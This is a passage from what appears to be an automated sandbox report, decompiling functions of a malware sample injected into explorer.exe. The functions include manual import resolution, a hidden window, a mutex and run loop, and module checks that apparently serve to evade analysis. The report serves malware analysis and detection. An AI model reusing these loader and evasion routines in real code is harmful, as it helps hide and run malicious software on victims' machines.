				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0008E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























                  0x000924a1
                  0x000924a9
                  0x000924be
                  0x000924d0
                  0x000924dc
                  0x000924e2
                  0x000924e7
                  0x000924f3
                  0x0009265e
                  0x00000000
                  0x0009265e
                  0x000924f9
                  0x00092502
                  0x00092510
                  0x00092513
                  0x00092522
                  0x00092522
                  0x00092529
                  0x00092537
                  0x0009253a
                  0x00092551
                  0x00092557
                  0x0009255e
                  0x0009256e
                  0x00092586
                  0x00092570
                  0x00092578
                  0x00092578
                  0x00092589
                  0x0009258d
                  0x00092599
                  0x0009259d
                  0x000925a1
                  0x000925a5
                  0x000925b1
                  0x000925dc
                  0x000925e4
                  0x000925f6
                  0x00092602
                  0x000925b3
                  0x000925b8
                  0x000925c3
                  0x000925cf
                  0x000925cf
                  0x0009260b
                  0x00092611
                  0x0009261b
                  0x00092637
                  0x0009261d
                  0x0009262c
                  0x0009262c
                  0x0009261b
                  0x0009263f
                  0x00092648
                  0x00092648
                  0x00092656
                  0x00000000
                  0x00092656
                  0x00092562
                  0x00000000
                  0x00092562
                  0x00000000
                  0x0009253a
                  0x00000000

                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
                  • LoadLibraryA.KERNEL32(00000000), ref: 00092551
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID: GetProcAddress$kernel32.dll
                  • API String ID: 4133054770-1584408056
                  • Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                  • Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
                  • Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                  • Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00082EDA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 164 82eda-82f50 memset call 8902d 169 82fcd-82fd4 164->169 170 82f52-82f81 CreateWindowExA 164->170 171 82fdf-82ff4 169->171 172 82fd6-82fd7 169->172 170->171 173 82f83-82f92 ShowWindow 170->173 172->171 175 82f9b 173->175 176 82fba-82fcb 175->176 176->169 178 82f9d-82fa0 176->178 178->169 179 82fa2-82fb2 178->179 179->176
                  C-Code - Quality: 96%
                  			E00082EDA(void* __eflags) {
				CHAR* _v12;
				struct HINSTANCE__* _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				char _v80;
				char _v144;
				intOrPtr _t25;
				intOrPtr _t32;
				struct HWND__* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				struct HWND__* _t44;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				struct HINSTANCE__* _t64;

				_t25 =  *0x9e684; // 0x40f8f0
				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
				memset( &_v52, 0, 0x30);
				_t59 =  *0x9e688; // 0xb0000
				E0008902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
				_v48 = 3;
				_v52 = 0x30;
				_v12 =  &_v144;
				_v44 = E00082E77;
				_push( &_v52);
				_t32 =  *0x9e694; // 0x40fa48
				_v32 = _t64;
				if( *((intOrPtr*)(_t32 + 8))() == 0) {
					L6:
					_t34 =  *0x9e718; // 0x50056
					if(_t34 != 0) {
						_t39 =  *0x9e694; // 0x40fa48
						 *((intOrPtr*)(_t39 + 0x28))(_t34);
					}
					L8:
					_t36 =  *0x9e694; // 0x40fa48
					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
					return 0;
				}
				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
				 *0x9e718 = _t44;
				if(_t44 == 0) {
					goto L8;
				}
				ShowWindow(_t44, 0);
				_t47 =  *0x9e694; // 0x40fa48
				 *((intOrPtr*)(_t47 + 0x18))( *0x9e718);
				while(1) {
					_t50 =  *0x9e694; // 0x40fa48
					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
					if(_t51 == 0) {
						goto L6;
					}
					if(_t51 == 0xffffffff) {
						goto L6;
					}
					_t53 =  *0x9e694; // 0x40fa48
					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
					_t56 =  *0x9e694; // 0x40fa48
					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
				}
				goto L6;
			}























                  0x00082ee3
                  0x00082ef2
                  0x00082ef9
                  0x00082efe
                  0x00082f18
                  0x00082f20
                  0x00082f2d
                  0x00082f34
                  0x00082f3a
                  0x00082f41
                  0x00082f42
                  0x00082f47
                  0x00082f50
                  0x00082fcd
                  0x00082fcd
                  0x00082fd4
                  0x00082fd7
                  0x00082fdc
                  0x00082fdc
                  0x00082fdf
                  0x00082fe7
                  0x00082fec
                  0x00082ff4
                  0x00082ff4
                  0x00082f77
                  0x00082f7a
                  0x00082f81
                  0x00000000
                  0x00000000
                  0x00082f8a
                  0x00082f8d
                  0x00082f98
                  0x00082fba
                  0x00082fc1
                  0x00082fc6
                  0x00082fcb
                  0x00000000
                  0x00000000
                  0x00082fa0
                  0x00000000
                  0x00000000
                  0x00082fa6
                  0x00082fab
                  0x00082fb2
                  0x00082fb7
                  0x00082fb7
                  0x00000000

                  APIs
                  • memset.MSVCRT ref: 00082EF9
                  • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00082F77
                  • ShowWindow.USER32(00000000,00000000), ref: 00082F8A
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Window$CreateShowmemset
                  • String ID: 0
                  • API String ID: 3027179219-4108050209
                  • Opcode ID: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                  • Instruction ID: 213deb34b0e2dc67e2747e7ce6682629aec82146620f961571f6702d7269f10e
                  • Opcode Fuzzy Hash: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                  • Instruction Fuzzy Hash: A93106B2500118AFF710EFA8DC89EAA7BBCFB18384F004066B649D72A2D634DD04CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00085631, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97sleepsynchronizationCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 78%
                  			E00085631(void* __edx, void* __edi) {
				char _v44;
				void* _t8;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t20;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t40;
				void* _t49;
				void* _t54;

				_t54 = __edi;
				_t8 = E00089E66(0x3b); // executed
				if(_t8 != 0xffffffff) {
					L2:
					E0008980C(0x9e6c8);
					_t39 = 0x37; // executed
					E00089F06(_t39);
					_t11 =  *0x9e688; // 0xb0000
					_t40 = 0x3a; // executed
					E00089F06(_t40); // executed
					E0008E4C1(_t63);
					_t14 =  *0x9e688; // 0xb0000
					_t41 =  &_v44;
					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
					E0008A86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
					_t17 =  *0x9e684; // 0x40f8f0
					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x9e6c8,  *0x9e6cc);
					 *0x9e74c = _t18;
					if(_t18 != 0) {
						_t20 = CreateMutexA(0, 0, 0);
						 *0x9e76c = _t20;
						__eflags = _t20;
						if(_t20 != 0) {
							_t34 = E00088604(0x1000);
							_t52 = 0;
							 *0x9e770 = _t34;
							_t49 =  *0x9e774; // 0x2
							__eflags = _t34;
							_t41 =  !=  ? 0 : _t49;
							__eflags = _t41;
							 *0x9e774 = _t41; // executed
						}
						E0008153B(_t41, _t52); // executed
						E000898EE(E00082EDA, 0, __eflags, 0, 0); // executed
						E00083017(); // executed
						E000831C2(0, __eflags); // executed
						E000829B1(); // executed
						E00083BB2(_t54, __eflags); // executed
						while(1) {
							__eflags =  *0x9e758; // 0x0
							if(__eflags != 0) {
								break;
							}
							E0008980C(0x9e750);
							_push(0x9e750);
							_push(0x9e750); // executed
							E0008279B();
							Sleep(0xfa0);
						}
						E00083D34();
						E00089A8E();
						E000834CB();
						_t33 = 0;
						__eflags = 0;
					} else {
						goto L3;
					}
				} else {
					_t36 = E00082DCB();
					_t63 = _t36;
					if(_t36 != 0) {
						L3:
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

















                  0x00085631
                  0x0008563d
                  0x00085646
                  0x00085651
                  0x00085656
                  0x00085669
                  0x0008566a
                  0x0008566f
                  0x0008567f
                  0x00085680
                  0x00085688
                  0x0008568d
                  0x00085692
                  0x0008569c
                  0x0008569f
                  0x000856a9
                  0x000856b1
                  0x000856b7
                  0x000856be
                  0x000856d0
                  0x000856d6
                  0x000856db
                  0x000856dd
                  0x000856e4
                  0x000856e9
                  0x000856eb
                  0x000856f1
                  0x000856f7
                  0x000856f9
                  0x000856f9
                  0x000856fc
                  0x000856fc
                  0x00085702
                  0x00085710
                  0x00085717
                  0x0008571c
                  0x00085721
                  0x00085726
                  0x00085750
                  0x00085750
                  0x00085756
                  0x00000000
                  0x00000000
                  0x00085732
                  0x00085737
                  0x00085738
                  0x00085739
                  0x0008574a
                  0x0008574a
                  0x00085758
                  0x0008575d
                  0x00085762
                  0x00085767
                  0x00085767
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00085648
                  0x00085648
                  0x0008564d
                  0x0008564f
                  0x000856c0
                  0x000856c2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008564f
                  0x0008576d

                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000856D0
                    • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                    • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                  • Sleep.KERNELBASE(00000FA0), ref: 0008574A
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: 3mNa$mNa
                  • API String ID: 3249252070-772915308
                  • Opcode ID: 3562f7877b88b9be417dacf07b104c639c27ee61355e5b92e6b06fab33a1451d
                  • Instruction ID: 618d9e32d6944c2961c1c58ef027407fe41e2fb87ac27e57644674ab890b217f
                  • Opcode Fuzzy Hash: 3562f7877b88b9be417dacf07b104c639c27ee61355e5b92e6b06fab33a1451d
                  • Instruction Fuzzy Hash: 0031D6312056509BF724FBB5EC069EA3B99FF557A0B144126F5C9861A3EE349900C763
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00084D6D, Relevance: 6.4, APIs: 4, Instructions: 432stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 231 84d6d-84d8f 232 84dee-84e1b call 8b7a8 call 8a86d call 8a471 231->232 233 84d91-84db3 call 895c7 * 2 231->233 246 84e1d-84e20 232->246 247 84e25-84e80 call 8e1bc call 895e1 call 892e5 call 885d5 call 8b269 232->247 233->232 243 84db5-84db7 233->243 243->232 245 84db9-84dc4 GetModuleHandleA 243->245 248 84dcd 245->248 249 84dc6-84dcb GetModuleHandleA 245->249 250 852b9-852bf 246->250 266 84ea1-84ed9 call 8861a call 84a0b 247->266 267 84e82-84e93 call 8896f 247->267 252 84dd5-84dec call 885c2 * 2 248->252 249->248 249->252 252->232 252->246 277 84ef8-84f1b 266->277 278 84edb-84ee3 266->278 272 84e9c-84e9f 267->272 273 84e95-84e97 call 8a2e3 267->273 272->266 273->272 280 84f1d-84f2b 277->280 281 84f2f-84f4d call 8e2c6 277->281 278->277 279 84ee5-84ee9 278->279 282 84eef-84ef2 279->282 283 851f3-85220 call 895e1 call 892e5 279->283 280->281 289 84f52-84f54 281->289 282->277 282->283 294 85222-8522b call 8b269 283->294 295 85247-852b4 call 885d5 lstrcpynW * 2 call 88fbe call 8861a * 2 283->295 291 84f71-84f78 289->291 292 84f56-84f6a call 8e2c6 289->292 291->283 293 84f7e-84f87 291->293 292->291 297 84f89-84f8e 293->297 298 84f96-84fa3 293->298 306 85239-85246 call 8861a 294->306 307 8522d-85232 294->307 328 852b7 295->328 297->298 302 84f90 297->302 298->283 303 84fa9-84fad 298->303 302->298 308 85082-85088 303->308 309 84fb3-84fb6 303->309 306->295 307->306 308->283 314 8508e-850ff call 849a5 call 8fc1f 308->314 309->283 312 84fbc-8500f call 849a5 call 88604 309->312 312->328 332 85015-8507d call 895e1 call 89640 call 885d5 call 8a911 call 8861a 312->332 314->283 331 85105-85119 call 88604 314->331 328->250 331->283 338 8511f-85171 call 8109a call 8902d call 860df 331->338 332->328 352 85173-851e2 call 89640 call 885d5 call 8a911 call 8861a 338->352 353 851e5-851f2 call 8861a 338->353 352->353 353->283
                  C-Code - Quality: 70%
                  			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				void* _t120;
				signed int _t122;
				intOrPtr _t123;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x9e688; // 0xb0000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t120 = E0008B7A8(0x9b9c8,  &_v516); // executed
					_t14 = _t120 + 1; // 0x1
					E0008A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E0008A471( &_v556, _t298);
					 *0x9e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						_t123 = E0008E1BC(0x9b9cc, _t299); // executed
						 *0x9e680 = _t123;
						 *_t337 = 0x610;
						_t124 = E000895E1(0x9b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x9e688; // 0xb0000
						_t127 = E000892E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E000885D5( &_v612);
						_t130 = E0008B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E0008861A( &_v616, 0xfffffffe);
						_t133 =  *0x9e688; // 0xb0000
						_t22 = _t133 + 0x114; // 0xb0114
						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x9e688; // 0xb0000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x9e680; // 0x40fda0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
							}
							_v620 = _v620 & 0x00000000;
							E0008E2C6(_t353,  &_v576); // executed
							_pop(_t262);
							_t142 =  *0x9e6b4; // 0x40fa98
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E0008E2C6(_t353,  &_v588);
								_t235 =  *0x9e6b4; // 0x40fa98
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x9e73c;
							if( *0x9e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x9e680; // 0x40fda0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x9e688; // 0xb0000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E000849A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x9e684; // 0x40f8f0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x9e688; // 0xb0000
											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E00088604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E0008109A(_t262, 0x148);
													_t305 =  *0x9e688; // 0xb0000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E0008902D(_t271,  &_v572);
													_t272 =  *0x9e688; // 0xb0000
													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x9e688; // 0xb0000
														__eflags = _t200 + 0x1020;
														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E000885D5( &_v636);
														E0008A911(_t333, 0, 0xbb8, 1);
														E0008861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E0008861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E000849A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x9e684; // 0x40f8f0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E00088604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E000895E1(_t278, 0x32d);
										_t280 =  *0x9e688; // 0xb0000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E000885D5( &_v636);
										E0008A911(_t249, 0, 0xbb8, 1);
										E0008861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E000895E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x9e688; // 0xb0000
								_t329 = E000892E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E0008B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x9e684; // 0x40f8f0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E0008861A( &_v612, 0xfffffffe);
								}
								E000885D5( &_v616);
								_t150 =  *0x9e688; // 0xb0000
								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
								_t153 =  *0x9e688; // 0xb0000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x9e738, 0x105);
								_t331 =  *0x9e688; // 0xb0000
								_t117 = _t331 + 0x228; // 0xb0228
								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
								E0008861A(0x9e740, 0xfffffffe);
								E0008861A(0x9e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E000895C7(0x6e2);
				_v616 = _t250;
				_t326 = E000895C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E000885C2( &_v616);
					_t122 = E000885C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}




















































































                  0x00084d6d
                  0x00084d73
                  0x00084d79
                  0x00084d7e
                  0x00084d8c
                  0x00084d8f
                  0x00084dee
                  0x00084df7
                  0x00084e00
                  0x00084e03
                  0x00084e0a
                  0x00084e0f
                  0x00084e14
                  0x00084e1b
                  0x00084e25
                  0x00084e2c
                  0x00084e32
                  0x00084e37
                  0x00084e3c
                  0x00084e43
                  0x00084e49
                  0x00084e4b
                  0x00084e4c
                  0x00084e50
                  0x00084e5b
                  0x00084e60
                  0x00084e69
                  0x00084e6e
                  0x00084e76
                  0x00084e7d
                  0x00084e7e
                  0x00084e80
                  0x00084e9c
                  0x00084e9f
                  0x00084e9f
                  0x00084ea8
                  0x00084ead
                  0x00084ebd
                  0x00084ec5
                  0x00084eca
                  0x00084ed0
                  0x00084ed3
                  0x00084ed9
                  0x00084ef8
                  0x00084efe
                  0x00084eff
                  0x00084f00
                  0x00084f01
                  0x00084f02
                  0x00084f03
                  0x00084f0d
                  0x00084f11
                  0x00084f16
                  0x00084f19
                  0x00084f1b
                  0x00084f2d
                  0x00084f2d
                  0x00084f2f
                  0x00084f3b
                  0x00084f40
                  0x00084f46
                  0x00084f4f
                  0x00084f52
                  0x00084f54
                  0x00084f5f
                  0x00084f64
                  0x00084f69
                  0x00084f6e
                  0x00084f6e
                  0x00084f71
                  0x00084f78
                  0x00000000
                  0x00084f7e
                  0x00084f7e
                  0x00084f83
                  0x00084f87
                  0x00084f89
                  0x00084f8c
                  0x00084f8e
                  0x00084f94
                  0x00084f94
                  0x00084f8e
                  0x00084f96
                  0x00084f9b
                  0x00084fa1
                  0x00084fa3
                  0x00000000
                  0x00084fa9
                  0x00084fa9
                  0x00084fad
                  0x00085082
                  0x00085088
                  0x0008508e
                  0x00085099
                  0x0008509a
                  0x0008509b
                  0x0008509c
                  0x000850a2
                  0x000850a7
                  0x000850ad
                  0x000850b5
                  0x000850bb
                  0x000850be
                  0x000850cd
                  0x000850d4
                  0x000850d7
                  0x000850e4
                  0x000850e8
                  0x000850f5
                  0x000850fa
                  0x000850fd
                  0x000850ff
                  0x00085110
                  0x00085112
                  0x00085116
                  0x00085117
                  0x00085119
                  0x00085124
                  0x00085129
                  0x00085136
                  0x0008513a
                  0x0008513b
                  0x0008513d
                  0x00085145
                  0x00085146
                  0x0008514b
                  0x00085163
                  0x00085168
                  0x0008516b
                  0x0008516f
                  0x00085171
                  0x00085184
                  0x0008518e
                  0x00085192
                  0x0008519a
                  0x0008519b
                  0x000851a3
                  0x000851a4
                  0x000851a9
                  0x000851b5
                  0x000851bf
                  0x000851d1
                  0x000851dd
                  0x000851e2
                  0x000851e2
                  0x000851ec
                  0x000851f2
                  0x000851f2
                  0x00085119
                  0x000850ff
                  0x00000000
                  0x00085088
                  0x00084fb3
                  0x00084fb6
                  0x00000000
                  0x00000000
                  0x00084fbc
                  0x00084fc7
                  0x00084fc8
                  0x00084fc9
                  0x00084fca
                  0x00084fd0
                  0x00084fd5
                  0x00084fe9
                  0x00084fee
                  0x00084ff2
                  0x00084ffd
                  0x00085006
                  0x00085008
                  0x0008500c
                  0x0008500d
                  0x0008500f
                  0x0008501a
                  0x00085020
                  0x00085032
                  0x00085035
                  0x00085038
                  0x00085045
                  0x0008504d
                  0x00085057
                  0x00085069
                  0x00085075
                  0x0008507a
                  0x00000000
                  0x0008500f
                  0x00084fa3
                  0x00084edb
                  0x00084edb
                  0x00084ee1
                  0x00084ee3
                  0x00000000
                  0x00000000
                  0x00084ee5
                  0x00084ee9
                  0x000851f3
                  0x000851f8
                  0x000851fe
                  0x00085200
                  0x00085201
                  0x00085205
                  0x00085215
                  0x0008521a
                  0x0008521e
                  0x00085220
                  0x00085224
                  0x00085229
